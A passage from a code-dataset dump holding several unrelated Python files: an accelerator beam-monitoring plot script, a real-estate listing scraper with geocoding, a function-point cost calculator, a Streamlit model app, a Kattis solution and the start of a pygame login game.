\"desc\": \"Booster avg. rep. rate\",\n \"devicename\": \"E:MBPRTE\",\n \"units\": \"Hz\",\n \"event\": \"p,60000\",\n \"color\": orange,\n \"yMin\": 0.0,\n \"yMax\": 10.0,\n}\ntry:\n\tt, d = acsysLoggerGet(booster_turns[\"devicename\"], booster_turns[\"event\"], T1, T2)\n\tbooster_turns[\"t_data\"] = t\n\tbooster_turns[\"data\"] = d\n\tt, d = acsysLoggerGet(bnb_rep[\"devicename\"], bnb_rep[\"event\"], T1, T2)\n\tbnb_rep[\"t_data\"] = t\n\tbnb_rep[\"data\"] = d\n\ttimePlot('BNB_rates', [booster_turns, bnb_rep], T1, T2, dims=[12, 4])\nexcept:\n\tpass\n\nlinac_tor = {\n \"desc\": \"Linac intensity\",\n \"devicename\": \"L:D7TOR\",\n \"units\": \"mA\",\n \"event\": \"p,15000\",\n \"color\": green,\n \"yMin\": 0.0,\n \"yMax\": 35.0,\n}\nbooster_loss = {\n \"desc\": \"Booster avg. 
loss\",\n \"devicename\": \"B:BPL5MA\",\n \"units\": \"Watts\",\n \"event\": \"p,30000\",\n \"color\": red,\n \"yMin\": 0.0,\n \"yMax\": 700.0,\n}\ntry:\n\tt, d = acsysLoggerGet(linac_tor[\"devicename\"], linac_tor[\"event\"], T1, T2)\n\tlinac_tor[\"t_data\"] = t\n\tlinac_tor[\"data\"] = d\n\tt, d = acsysLoggerGet(booster_loss[\"devicename\"], booster_loss[\"event\"], T1, T2)\n\tbooster_loss[\"t_data\"] = t\n\tbooster_loss[\"data\"] = d\n\ttimePlot('BNB_upstream1', [linac_tor, booster_loss], T1, T2, dims=[12, 4])\nexcept:\n\tpass\n\t\nbooster_rate = {\n \"desc\": \"Booster rate\",\n \"devicename\": \"E:BTRATE\",\n \"units\": \"Hz\",\n \"event\": \"p,30000\",\n \"color\": orange,\n \"yMin\": 0.0,\n \"yMax\": 18.0,\n}\nbooster_eff = {\n \"desc\": \"Booster $1D efficiency\",\n \"devicename\": \"B:BEFF1D\",\n \"units\": \"%\",\n \"event\": \"p,15000\",\n \"color\": blue,\n \"yMin\": 60.0,\n \"yMax\": 100.0,\n}\ntry:\n\tt, d = acsysLoggerGet(booster_rate[\"devicename\"], booster_rate[\"event\"], T1, T2)\n\tbooster_rate[\"t_data\"] = t\n\tbooster_rate[\"data\"] = d\n\tt, d = acsysLoggerGet(booster_eff[\"devicename\"], booster_eff[\"event\"], T1, T2)\n\tbooster_eff[\"t_data\"] = t\n\tbooster_eff[\"data\"] = d\n\ttimePlot('BNB_upstream2', [booster_rate, booster_eff], T1, T2, dims=[12, 4])\nexcept:\n\tpass\n\nTLI864 = {\n \"desc\": \"Loss @ 864\",\n \"devicename\": \"E:TLI864\",\n \"units\": \"R/s\",\n \"event\": \"e,1D,e,50\",\n \"color\": blue,\n \"yMin\": 0.0,\n \"yMax\": 12.0,\n}\nTLI873 = {\n \"desc\": \"Loss @ 873\",\n \"devicename\": \"E:TLI873\",\n \"units\": \"R/s\",\n \"event\": \"e,1D,e,50\",\n \"color\": green,\n \"yMin\": 0.0,\n \"yMax\": 12.0,\n}\ntry:\n\tt, d = acsysLoggerGet(TLI864[\"devicename\"], TLI864[\"event\"], T1, T2)\n\tTLI864[\"t_data\"] = t\n\tTLI864[\"data\"] = d\n\tt, d = acsysLoggerGet(TLI873[\"devicename\"], TLI873[\"event\"], T1, T2)\n\tTLI873[\"t_data\"] = t\n\tTLI873[\"data\"] = d\n\ttimePlot('BNB_TLI', [TLI864, TLI873], T1, T2, dims=[12, 4])\nexcept:\n\tpass\n\nhorn_current = {\n \"desc\": \"BNB horn current\",\n \"devicename\": \"E:LHCURR\",\n \"units\": \"KA\",\n \"event\": \"p,3000\",\n \"color\": red,\n \"yMin\": 172.0,\n \"yMax\": 182.0,\n}\ntry:\n\tt, d = acsysLoggerGet(horn_current[\"devicename\"], horn_current[\"event\"], T1, T2)\n\thorn_current[\"t_data\"] = t\n\thorn_current[\"data\"] = d\n\ttimePlot('BNB_horn', [horn_current], T1, T2, dims=[12, 4])\nexcept:\n\tpass\n\ntgt_jtmp1 = {\n \"desc\": \"Target temp. @ joint\",\n \"devicename\": \"E:BTJT1\",\n \"units\": \"DegC\",\n \"event\": \"p,30000\",\n \"color\": black,\n \"yMin\": 10.0,\n \"yMax\": 110.0,\n}\ntgt_jtmp2 = {\n \"desc\": \"Target temp. > joint\",\n \"devicename\": \"E:BTJT2\",\n \"units\": \"DegC\",\n \"event\": \"p,30000\",\n \"color\": orange,\n \"yMin\": 10.0,\n \"yMax\": 110.0,\n}\ntry:\n\tt, d = acsysLoggerGet(tgt_jtmp1[\"devicename\"], tgt_jtmp1[\"event\"], T1, T2)\n\ttgt_jtmp1[\"t_data\"] = t\n\ttgt_jtmp1[\"data\"] = d\n\tt, d = acsysLoggerGet(tgt_jtmp2[\"devicename\"], tgt_jtmp2[\"event\"], T1, T2)\n\ttgt_jtmp2[\"t_data\"] = t\n\ttgt_jtmp2[\"data\"] = d\n\ttimePlot('BNB_tgtjtmps', [tgt_jtmp1, tgt_jtmp2], T1, T2, dims=[12, 4])\nexcept:\n\tpass\n\ntgt_btmp1 = {\n \"desc\": \"Target temp. @ bend\",\n \"devicename\": \"E:BTBT1\",\n \"units\": \"DegC\",\n \"event\": \"p,30000\",\n \"color\": grey,\n \"yMin\": 10.0,\n \"yMax\": 110.0,\n}\ntgt_btmp2 = {\n \"desc\": \"Target temp. 
> bend\",\n \"devicename\": \"E:BTBT2\",\n \"units\": \"DegC\",\n \"event\": \"p,30000\",\n \"color\": gold,\n \"yMin\": 10.0,\n \"yMax\": 110.0,\n}\ntry:\n\tt, d = acsysLoggerGet(tgt_btmp1[\"devicename\"], tgt_btmp1[\"event\"], T1, T2)\n\ttgt_btmp1[\"t_data\"] = t\n\ttgt_btmp1[\"data\"] = d\n\tt, d = acsysLoggerGet(tgt_btmp2[\"devicename\"], tgt_btmp2[\"event\"], T1, T2)\n\ttgt_btmp2[\"t_data\"] = t\n\ttgt_btmp2[\"data\"] = d\n\ttimePlot('BNB_tgtbtmps', [tgt_btmp1, tgt_btmp2], T1, T2, dims=[12, 4])\nexcept:\n\tpass\n\ntgt_bth1t1 = {\n \"desc\": \"Target HEX 1 in temp.\",\n \"devicename\": \"E:BTH1T1\",\n \"units\": \"DegC\",\n \"event\": \"p,30000\",\n \"color\": blue,\n \"yMin\": 0.0,\n \"yMax\": 120.0,\n}\ntgt_bth1t2 = {\n \"desc\": \"Target HEX 1 out temp.\",\n \"devicename\": \"E:BTH1T2\",\n \"units\": \"DegC\",\n \"event\": \"p,30000\",\n \"color\": orange,\n \"yMin\": 0.0,\n \"yMax\": 120.0,\n}\ntry:\n\tt, d = acsysLoggerGet(tgt_bth1t1[\"devicename\"], tgt_bth1t1[\"event\"], T1, T2)\n\ttgt_bth1t1[\"t_data\"] = t\n\ttgt_bth1t1[\"data\"] = d\n\tt, d = acsysLoggerGet(tgt_btmp2[\"devicename\"], tgt_bth1t2[\"event\"], T1, T2)\n\ttgt_bth1t2[\"t_data\"] = t\n\ttgt_bth1t2[\"data\"] = d\n\ttimePlot('BNB_tgthtmps1', [tgt_bth1t1, tgt_bth1t2], T1, T2, dims=[12, 4])\nexcept:\n\tpass\n\ntgt_bth2t1 = {\n \"desc\": \"Target HEX 2 in temp.\",\n \"devicename\": \"E:BTH2T1\",\n \"units\": \"DegC\",\n \"event\": \"p,30000\",\n \"color\": red,\n \"yMin\": 0.0,\n \"yMax\": 120.0,\n}\ntgt_bth2t2 = {\n \"desc\": \"Target HEX 2 out temp.\",\n \"devicename\": \"E:BTH2T2\",\n \"units\": \"DegC\",\n \"event\": \"p,30000\",\n \"color\": black,\n \"yMin\": 0.0,\n \"yMax\": 120.0,\n}\ntry:\n\tt, d = acsysLoggerGet(tgt_bth2t1[\"devicename\"], tgt_bth2t1[\"event\"], T1, T2)\n\ttgt_bth2t1[\"t_data\"] = t\n\ttgt_bth2t1[\"data\"] = d\n\tt, d = acsysLoggerGet(tgt_bth2t2[\"devicename\"], tgt_bth2t2[\"event\"], T1, T2)\n\ttgt_bth2t2[\"t_data\"] = t\n\ttgt_bth2t2[\"data\"] = d\n\ttimePlot('BNB_tgthtmps2', [tgt_bth2t1, tgt_bth2t2], T1, T2, dims=[12, 4])\nexcept:\n\tpass\n\ntgt_hexv1 = {\n \"desc\": \"Target HEX 1 air vel.\",\n \"devicename\": \"E:BTH1AV\",\n \"units\": \"ft./m\",\n \"event\": \"p,30000\",\n \"color\": blue,\n \"yMin\": 0.0,\n \"yMax\": 2000.0,\n}\ntgt_hexv2 = {\n \"desc\": \"Target HEX 2 air vel.\",\n \"devicename\": \"E:BTH2AV\",\n \"units\": \"ft./m\",\n \"event\": \"p,30000\",\n \"color\": green,\n \"yMin\": 0.0,\n \"yMax\": 2000.0,\n}\ntry:\n\tt, d = acsysLoggerGet(tgt_hexv1[\"devicename\"], tgt_hexv1[\"event\"], T1, T2)\n\ttgt_hexv1[\"t_data\"] = t\n\ttgt_hexv1[\"data\"] = d\n\tt, d = acsysLoggerGet(tgt_hexv2[\"devicename\"], tgt_hexv2[\"event\"], T1, T2)\n\ttgt_hexv2[\"t_data\"] = t\n\ttgt_hexv2[\"data\"] = d\n\ttimePlot('BNB_tgtairvel', [tgt_hexv1, tgt_hexv2], T1, T2, dims=[12, 4])\nexcept:\n\tpass\n\ntgt_blp = {\n \"desc\": \"Target blower pressure\",\n \"devicename\": \"E:BTBLAP\",\n \"units\": \"PSIG\",\n \"event\": \"p,30000\",\n \"color\": red,\n \"yMin\": 0.0,\n \"yMax\": 10.0,\n}\ntgt_h1p = {\n \"desc\": \"Target HEX1 pressure\",\n \"devicename\": \"E:BTH1AP\",\n \"units\": \"PSIG\",\n \"event\": \"p,30000\",\n \"color\": black,\n \"yMin\": 0.0,\n \"yMax\": 10.0,\n}\ntry:\n\tt, d = acsysLoggerGet(tgt_blp[\"devicename\"], tgt_blp[\"event\"], T1, T2)\n\ttgt_blp[\"t_data\"] = t\n\ttgt_blp[\"data\"] = d\n\tt, d = acsysLoggerGet(tgt_hexv2[\"devicename\"], tgt_hexv2[\"event\"], T1, T2)\n\ttgt_h1p[\"t_data\"] = t\n\ttgt_h1p[\"data\"] = d\n\ttimePlot('BNB_tgtairp', [tgt_blp, tgt_h1p], T1, T2, 
dims=[12, 4])\nexcept:\n\tpass\n","repo_name":"awattsFNAL/acsys_example","sub_path":"bnb.py","file_name":"bnb.py","file_ext":"py","file_size_in_byte":8226,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"28906179606","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sun Dec 9 19:17:48 2018\n\n@author: Sudipta\n\n\"\"\"\n\ndef get_data(location, post_code):\n \n from requests import get\n from bs4 import BeautifulSoup\n import pandas as pd\n from time import sleep\n from random import randint\n from collections import defaultdict\n \n data = defaultdict(list)\n headers = ({'User-Agent':'Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36'})\n url = 'https://www.realestate.com.au/buy/property-house-in-{loc},+nsw+{code}/list-'.format(loc=location, code=post_code)\n \n n_pages = 0\n\n for page in range(0,40):\n n_pages += 1\n response = get(url+str(n_pages), headers= headers)\n html_soup = BeautifulSoup(response.text, 'html.parser')\n\n house_containers = html_soup.find_all('div', class_=\"residential-card__content\")\n if house_containers != []: \n for house in house_containers: \n try:\n data[\"price\"].append(house.find_all('span', class_='property-price')[0].text)\n except:\n data[\"price\"].append(None)\n try:\n weblink = house.find('a')\n href = 'https://www.realestate.com.au'+weblink.get('href')\n data['link'].append(href)\n except:\n data[\"link\"].append(None)\n \n try:\n data[\"location\"].append(house.find_all('span', class_='')[1].text)\n except:\n data[\"location\"].append(None)\n \n try:\n data[\"property_type\"].append(house.find_all('span', class_=\"residential-card__property-type\")[0].text)\n except:\n data[\"property_type\"].append(None)\n \n try:\n data[\"beds\"].append(house.find_all('span', class_=\"general-features__icon general-features__beds\")[0].text)\n except:\n data[\"beds\"].append(None)\n try:\n data[\"baths\"].append(house.find_all('span', class_=\"general-features__icon general-features__baths\")[0].text)\n except:\n data[\"baths\"].append(None)\n \n try:\n data[\"parking\"].append(house.find_all('span', class_=\"general-features__icon general-features__cars\")[0].text)\n except:\n data[\"parking\"].append(None)\n \n try:\n data[\"size_m2\"].append(house.find_all('span', class_=\"property-size__icon property-size__land\")[0].text) \n except:\n data[\"size_m2\"].append(None)\n else:\n break\n \n sleep(randint(1,2)) \n\n df = pd.DataFrame.from_dict(data)\n \n print('You scraped {} pages containing {} properties.'.format(n_pages, df.shape[0]))\n \n return df\n\ndef get_price(series):\n \n import re\n import numpy as np \n \n def clean_price(string):\n \n num = re.sub('[^\\d]','', string)\n \n return int(num.strip())\n \n try :\n if '$' in series:\n ## To to find to capture million dollar values and change the patteren\n match = re.findall(r'\\$(.*)',series)\n value = match[0] \n #Million dollors string check\n if '.' 
in value: \n val1 = re.search(r'(\\d[\\.]?\\d)', value)\n p = clean_price(val1.group())\n price = p*100000\n \n return price\n elif '-' in value: \n p1, p2 = value.split('-')\n price = round((clean_price(p1) + clean_price(p2))/2, 0)\n \n return price\n \n \n else:\n \n return clean_price(value)\n except: \n \n return np.nan\n \n\ndef clean_data(df):\n \n import pandas as pd\n df = df.fillna({'Price': 'missing','location': 'Unknown','beds': 0,\n 'bath': 0,'parking': 0, 'size_m2': '0'})\n df['beds'] = pd.to_numeric(df['beds'], errors='coerce')\n df['baths'] = pd.to_numeric(df['baths'], errors='coerce')\n df['parking'] = pd.to_numeric(df['parking'], errors='coerce')\n df['size_m2'] = df['size_m2'].str.strip().apply(lambda x : x if x.isdigit() else x.replace(',',''))\n df['size_m2'] = pd.to_numeric(df['size_m2'], errors = 'coerce')\n \n df['clean_price'] = df['price'].apply(get_price)\n return df\ndef get_lat_lon(location):\n \n import requests\n with open('../google_geocode_api.txt') as f:\n token = f.read().strip()\n \n if location.startswith('Address available on request'):\n location = location.replace('Address available on request,', '')\n \n try:\n location = location + ' NSW, Australia' \n url = f'https://maps.googleapis.com/maps/api/geocode/json?address={location}&key={token}'\n response = requests.get(url)\n if not response.status_code == 200:\n return (response.status_code, None)\n data = response.json()\n lat = data['results'][0]['geometry']['location']['lat']\n lng = data['results'][0]['geometry']['location']['lng']\n \n return (lat, lng)\n except:\n return (0.0, 0.0)\n## Geocoding address to lat lon and assign to dataframe columns\n \ndata[['latitude', 'longitude']] = data.apply(lambda row :pd.Series(get_lat_lon(row['location'])), axis=1) \n\ndef price_m2(price, m2):\n \n import numpy as np\n try:\n \n return price/m2\n except:\n return np.nan\ndata['price_m2'] = data.apply(lambda x: price_m2(x['clean_price'], x['size_m2']), axis=1)\n ","repo_name":"sudpaul/life_hack","sub_path":"realestate.py","file_name":"realestate.py","file_ext":"py","file_size_in_byte":5822,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"20244939310","text":"##Banco de dados\nbd = int(input(\"Quantidade de BD: \"))\narquivo = []\ntotal = 0\nfor i in range(0,bd):\n arquivo.append(int(input(\"Quantidade de linhas: \")))\n total = total + arquivo[i]\n##Entrada\ndadosref = 0\ndadosref1 = 0\ndadosref2 = 0\nfor i in range(0,bd):\n if arquivo[i] <= 4:\n dadosref = dadosref + 1\n if arquivo[i] >= 5 and arquivo[i] <= 15:\n dadosref1 = dadosref1 + 1\n if arquivo[i] >= 16:\n dadosref2 = dadosref2 + 1\nentsimples = []\nentmedio = []\nentcomplexo = []\nif dadosref <= 1:\n entsimples.append(dadosref)\nelif dadosref == 2:\n entsimples.append(dadosref)\nelif dadosref >= 3:\n entmedio.append(dadosref)\nif dadosref1 <= 1:\n entsimples.append(dadosref1)\nelif dadosref1 == 2:\n entmedio.append(dadosref1)\nelif dadosref1 >= 3:\n entcomplexo.append(dadosref1)\nif dadosref2 <= 1:\n entmedio.append(dadosref2)\nelif dadosref2 == 2:\n entcomplexo.append(dadosref2)\nelif dadosref2 >= 3:\n entcomplexo.append(dadosref2)\nsomasimples = 0\nsomamedio = 0\nsomacomplexo = 0\nfor i in range(0,len(entsimples)):\n somasimples = entsimples[i] * 3 + somasimples\nfor i in range(0,len(entmedio)):\n somamedio = entmedio[i] * 4 + somamedio\nfor i in range(0,len(entcomplexo)):\n somacomplexo = entcomplexo[i] * 6 + somacomplexo\n##print(\"Entrada simples:\", somasimples)\n##print(\"Entrada 
médio:\", somamedio)\n##print(\"Entrada complexo:\", somacomplexo)\n##Saída\nsaidadadosref = 0\nsaidadadosref1 = 0\nsaidadadosref2 = 0\nfor i in range(0,bd):\n if arquivo[i] <= 5:\n saidadadosref = saidadadosref + 1\n if arquivo[i] >= 6 and arquivo[i] <= 19:\n saidadadosref1 = saidadadosref1 + 1\n if arquivo[i] >= 20:\n saidadadosref2 = saidadadosref2 + 1\nif total <=5:\n saidadadosref = saidadadosref +1\nif total >= 6 and total <= 19:\n saidadadosref1 = saidadadosref1 +1\nif total >= 20:\n saidadadosref2 = saidadadosref2 +1\nsaidasimples = []\nsaidamedio = []\nsaidacomplexo = []\nif saidadadosref <= 1:\n saidasimples.append(saidadadosref)\nelif saidadadosref >= 2 and saidadadosref <= 3:\n saidasimples.append(saidadadosref)\nelif saidadadosref >= 4:\n saidamedio.append(saidadadosref)\nif saidadadosref1 <= 1:\n saidasimples.append(saidadadosref1)\nelif saidadadosref1 >= 2 and saidadadosref1 <= 3:\n saidamedio.append(saidadadosref1)\nelif saidadadosref1 >= 4:\n saidacomplexo.append(saidadadosref1)\nif saidadadosref2 <= 1:\n saidamedio.append(saidadadosref2)\nelif saidadadosref2 >= 2 and saidadadosref2 <= 3:\n saidacomplexo.append(saidadadosref2)\nelif saidadadosref2 >= 4:\n saidacomplexo.append(saidadadosref2)\nsdsimples = 0\nsdmedio = 0\nsdcomplexo = 0\nfor i in range(0,len(saidasimples)):\n sdsimples = saidasimples[i] * 4 + sdsimples\nfor i in range(0,len(saidamedio)):\n sdmedio = saidamedio[i] * 5 + sdmedio\nfor i in range(0,len(saidacomplexo)):\n sdcomplexo = saidacomplexo[i] * 7 + sdcomplexo\n##print(\"Saida simples:\", sdsimples)\n##print(\"Saida médio:\", sdmedio)\n##print(\"Saida complexo:\", sdcomplexo)\n##Consulta\nconsultadadosref = 0\nconsultadadosref1 = 0\nconsultadadosref2 = 0\nfor i in range(0,bd):\n if arquivo[i] <= 4:\n consultadadosref = consultadadosref + 1\n if arquivo[i] >= 5 and arquivo[i] <= 15:\n consultadadosref1 = consultadadosref1 + 1\n if arquivo[i] >= 16:\n consultadadosref2 = consultadadosref2 + 1\nif total <=4:\n consultadadosref = consultadadosref +1\nif total >= 5 and total <= 15:\n consultadadosref1 = consultadadosref1 +1\nif total >= 16:\n consultadadosref2 = consultadadosref2 +1\nconsultasimples = []\nconsultamedio = []\nconsultacomplexo = []\nif consultadadosref <= 1:\n consultasimples.append(consultadadosref)\nelif consultadadosref == 2:\n consultasimples.append(consultadadosref)\nelif consultadadosref >= 3:\n consultamedio.append(consultadadosref)\nif consultadadosref1 <= 1:\n consultasimples.append(consultadadosref1)\nelif consultadadosref1 == 2:\n consultamedio.append(consultadadosref1)\nelif consultadadosref1 >= 3:\n consultacomplexo.append(consultadadosref1)\nif consultadadosref2 <= 1:\n consultamedio.append(consultadadosref2)\nelif consultadadosref2 == 2:\n consultacomplexo.append(consultadadosref2)\nelif consultadadosref2 >= 3:\n consultacomplexo.append(consultadadosref2)\nconsimples = 0\nconmedio = 0\nconcomplexo = 0\nfor i in range(0,len(consultasimples)):\n consimples = consultasimples[i] * 3 + consimples\nfor i in range(0,len(consultamedio)):\n conmedio = consultamedio[i] * 4 + conmedio\nfor i in range(0,len(consultacomplexo)):\n concomplexo = consultacomplexo[i] * 6 + concomplexo\n##print(\"Consulta simples:\", consimples)\n##print(\"Consulta médio:\", conmedio)\n##print(\"Consulta complexo:\", concomplexo)\n##Arquivos\narqdadosref = 0\narqdadosref1 = 0\narqdadosref2 = 0\nfor i in range(0,bd):\n if arquivo[i] <= 19:\n arqdadosref = arqdadosref + 1\n if arquivo[i] >= 20 and arquivo[i] <= 50:\n arqdadosref1 = arqdadosref1 + 1\n if arquivo[i] >= 
51:\n arqdadosref2 = arqdadosref2 + 1\narqsimples = []\narqmedio = []\narqcomplexo = []\nif arqdadosref <= 1:\n arqsimples.append(arqdadosref)\nelif arqdadosref >= 2 and arqdadosref <= 5:\n arqsimples.append(arqdadosref)\nelif arqdadosref >= 6:\n arqmedio.append(arqdadosref)\nif arqdadosref1 <= 1:\n arqsimples.append(arqdadosref1)\nelif arqdadosref1 >= 2 and arqdadosref1 <= 5:\n arqmedio.append(arqdadosref1)\nelif arqdadosref1 >= 6:\n arqcomplexo.append(arqdadosref1)\nif arqdadosref2 <= 1:\n arqmedio.append(arqdadosref2)\nelif arqdadosref2 >= 2 and arqdadosref2 <= 5:\n arqcomplexo.append(arqdadosref2)\nelif arqdadosref2 >= 6:\n arqcomplexo.append(arqdadosref2)\narqsomasimples = 0\narqsomamedio = 0\narqsomacomplexo = 0\nfor i in range(0,len(arqsimples)):\n arqsomasimples = arqsimples[i] * 7 + arqsomasimples\nfor i in range(0,len(arqmedio)):\n arqsomamedio = arqmedio[i] * 10 + arqsomamedio\nfor i in range(0,len(arqcomplexo)):\n arqsomacomplexo = arqcomplexo[i] * 15 + arqsomacomplexo\n##print(\"Arquivo simples:\", arqsomasimples)\n##print(\"Arquivo médio:\", arqsomamedio)\n##print(\"Arquivo complexo:\", arqsomacomplexo)\n##Interfaces\nintdadosref = 0\nintdadosref1 = 0\nintdadosref2 = 0\nfor i in range(0,bd):\n if arquivo[i] <= 19:\n intdadosref = intdadosref + 1\n if arquivo[i] >= 20 and arquivo[i] <= 50:\n intdadosref1 = intdadosref1 + 1\n if arquivo[i] >= 51:\n intdadosref2 = intdadosref2 + 1\nif total <= 19:\n intdadosref = intdadosref +1\nif total >= 20 and total <= 50:\n intdadosref1 = intdadosref1 +1\nif total >= 51:\n intdadosref2 = intdadosref2 +1\nintsimples = []\nintmedio = []\nintcomplexo = []\nif intdadosref <= 1:\n intsimples.append(intdadosref)\nelif intdadosref >= 2 and intdadosref <= 5:\n intsimples.append(intdadosref)\nelif intdadosref >= 6:\n intmedio.append(intdadosref)\nif intdadosref1 <= 1:\n intsimples.append(intdadosref1)\nelif intdadosref1 >= 2 and intdadosref1 <= 5:\n intmedio.append(intdadosref1)\nelif intdadosref1 >= 6:\n intcomplexo.append(intdadosref1)\nif intdadosref2 <= 1:\n intmedio.append(intdadosref2)\nelif intdadosref2 >= 2 and intdadosref2 <= 5:\n intcomplexo.append(intdadosref2)\nelif intdadosref2 >= 6:\n intcomplexo.append(intdadosref2)\nintsomasimples = 0\nintsomamedio = 0\nintsomacomplexo = 0\nfor i in range(0,len(intsimples)):\n intsomasimples = intsimples[i] * 5 + intsomasimples\nfor i in range(0,len(intmedio)):\n intsomamedio = intmedio[i] * 7 + intsomamedio\nfor i in range(0,len(intcomplexo)):\n intsomacomplexo = intcomplexo[i] * 10 + intsomacomplexo\n##print(\"Saida simples:\", intsomasimples)\n##print(\"Saida médio:\", intsomamedio)\n##print(\"Saida complexo:\", intsomacomplexo)\n##Calculos finais\nfpb = somasimples + somamedio + somacomplexo + sdsimples + sdmedio + sdcomplexo + intsomasimples + intsomamedio + intsomacomplexo + arqsomasimples + arqsomamedio + arqsomacomplexo + consimples + conmedio + concomplexo\nni = 1.35\nfpr = round(fpb * ni)\nprint(fpr)\nprint('''[1] - Cobol\n[2] - Pascal\n[3] - C++\n[4] - Java, Delph, Visual Basic\n[5] - SQL, HTML''')\nlocfp = int(input(\"Escolha uma opção: \"))\nprod = 0\nif locfp == 1:\n prod = fpr * 100\nif locfp == 2:\n prod = fpr * 90\nif locfp == 3:\n prod = fpr * 30\nif locfp == 4:\n prod = fpr * 20\nif locfp == 5:\n prod = fpr * 15\nprint('''[1] - Sistema Comercial\n[2] - Sistema Eletrônico\n[3] - Sistema Web''')\nsistema = int(input(\"Qual tipo de sistema: \"))\nif sistema == 1:\n prodmes = prod / 2500\nif sistema == 2:\n prodmes = prod / 3600\nif sistema == 3:\n prodmes = prod / 3300\nvh = 
int(input(\"Qual o valor da hora: \"))\ncusto = prodmes * 132 * vh\nprint('R${:.2f}'.format(custo))","repo_name":"Lucascvlh/CalculadoraMetrica","sub_path":"metrica.py","file_name":"metrica.py","file_ext":"py","file_size_in_byte":8589,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"3412947568","text":"import streamlit as st\nfrom sklearn.ensemble import GradientBoostingRegressor\nfrom sklearn.ensemble import RandomForestRegressor\nfrom sklearn.model_selection import GridSearchCV\nfrom metaflow import Flow\nfrom metaflow import get_metadata, metadata\nimport matplotlib.pyplot as plt\nimport pandas as pd\nFLOW_NAME = 'MyFlow'\nmetadata('/home/bowenen/')\nprint(get_metadata())\n \n@st.cache\ndef get_latest_successful_run(flow_name: str):\n \"Gets the latest successfull run.\"\n for r in Flow(flow_name).runs():\n if r.successful: \n return r\n\nlatest_run = get_latest_successful_run(FLOW_NAME)\nlatest_model_no = latest_run.data.best_model_no\nlatest_model_no2 = latest_run.data.best_model_no2\nlatest_model_pm = latest_run.data.best_model_pm\n\n\n# show predictions\nst.markdown(\"## Predictions\")\n\n# play with the model\nst.markdown(\"## Model\")\n_x1 = st.text_input('closest_highway:', 3)\n_x2 = st.text_input('wind: ', 2)\n_x3 = st.text_input('road_type_motorway: ', 1)\n_x = {\n 'pop_den':[7],\n 'wind': [_x2],\n 'temp':[14],\n 'closest_highway': [_x1],\n 'closest_primary':[25],\n 'closest_secondary':[5],\n 'closest_tertiary':[5],\n 'trafic_signal_dist':[10],\n 'stop_sign_dist':[15],\n 'road_type_motorway': [_x3],\n 'road_type_primary':[0],\n 'zone_residential':[0],\n 'road_type_secondary':[0],\n 'road_type_tertiary':[0],\n 'zone_commercial':[0],\n 'zone_industrial':[0],\n 'zone_mixed':[0],\n 'zone_open_space':[0],\n 'road_type_residential':[0]\n}\n_x = pd.DataFrame(_x)\nval_no = latest_model_no.predict(_x)\nval_no2 = latest_model_no2.predict(_x)\nval_pm = latest_model_pm.predict(_x)\nst.write('Inputs are: closest_highway: {}, wind: {}, road_type_motorway: {}'.format(_x1, _x2, _x3))\nst.write('NO prediction is {}, NO2 prediction is {}, PM2.5 prediction is {}'.format(val_no, val_no2, val_pm))\nst.markdown(\"## Feature Importance\")\nFI_no = pd.DataFrame(latest_model_no.best_estimator_.feature_importances_, index = _x.columns, columns=['Feature Importance'])\nFI_no = FI_no.sort_values(by = 'Feature Importance',ascending=False)\nFI_no2 = pd.DataFrame(latest_model_no2.best_estimator_.feature_importances_, index = _x.columns, columns=['Feature Importance'])\nFI_no2 = FI_no2.sort_values(by = 'Feature Importance',ascending=False)\nFI_pm = pd.DataFrame(latest_model_pm.best_estimator_.feature_importances_, index = _x.columns, columns=['Feature Importance'])\nFI_pm = FI_pm.sort_values(by = 'Feature Importance',ascending=False)\nsummary_ = pd.DataFrame({'NO':list(FI_no.index),\n 'NO2':list(FI_no2.index),\n 'PM2.5':list(FI_pm.index)})\nst.write(summary_)\n\n# python3 -m streamlit run app.py","repo_name":"bowenen/FRE7773_FinalProject_Team5","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":2647,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"21994999330","text":"# ***Pot Solution***\n# Difficulty: 1.3\n# Time Limit: 1 second, Memory Limit: 1024 MB\n# CPU Time: 0.05 s\n# Author: Nikola Dmitrović\n# Source: Croatian Open Competition in Informatics 2015/2016, contest #3\n# Link: https://open.kattis.com/problems/pot\n\n\nn = int(input())\ns = 0\nfor _ in 
range(n):\n b = input()\n p = int(b[-1])\n x = int(b[:-1])\n s += x ** p\nprint(s)\n","repo_name":"ahmedsiad/kattis-solutions","sub_path":"pot/pot.py","file_name":"pot.py","file_ext":"py","file_size_in_byte":367,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"19964447539","text":"import pygame as pg\r\nimport sys\r\nimport random\r\nimport time\r\nprint(\"\"\"\r\n\r\n\"\"\")\r\n# print(\"\"\"\t\t\t \r\n# \t\t _oo8oo_\r\n# \t\t o8888888o\r\n# \t\t 88: . :88\r\n# \t\t (: -_- :)\r\n# \t\t 0\\ = /0\r\n# \t\t ____/'==='\\____\r\n\t\t \r\n# \t\"\"\")\r\nprint(\"\"\"\r\n\t\t\t _oo8oo_\r\n\t\t\t o8888888o\r\n\t\t\t 88: . :88\r\n\t\t\t (: -_- :)\r\n\t\t\t 0\\ = /0\r\n\t\t\t ____/'==='\\____\r\n\t\t\t\t 欢迎使用Python游戏平台\r\n\r\n\t1.登录账号密码,正确直接进入2,若输入3次也可以进入,但提示游客身份进入。\r\n\t2.系统产生1-10随机数,猜对直接进入3,或猜错5次也可以进入,但提示未通关。\r\n\t3.接小球游戏,每三次速度加快,分数翻倍。\r\n\r\n\t\t********谢谢大家观看*******\r\n\t\"\"\")\r\ncount = 0\r\nwhile count < 3:\r\n name = str(input(\"请输入帐号\"))\r\n passwd = str(input(\"请输入密码\"))\r\n if (name != \"suntao\" or passwd != \"123456\"):\r\n count += 1\r\n s = 3 - count\r\n print(\"输入错误,还剩%d次机会\\n\" % s)\r\n if s == 0:\r\n print(\"您是游客身份登录\")\r\n else:\r\n print(\"尊敬的VIP,您已登录成功,直接进入游戏\\n\")\r\n break\r\n\r\ncount1 = 0\r\nnumber = random.randint(1, 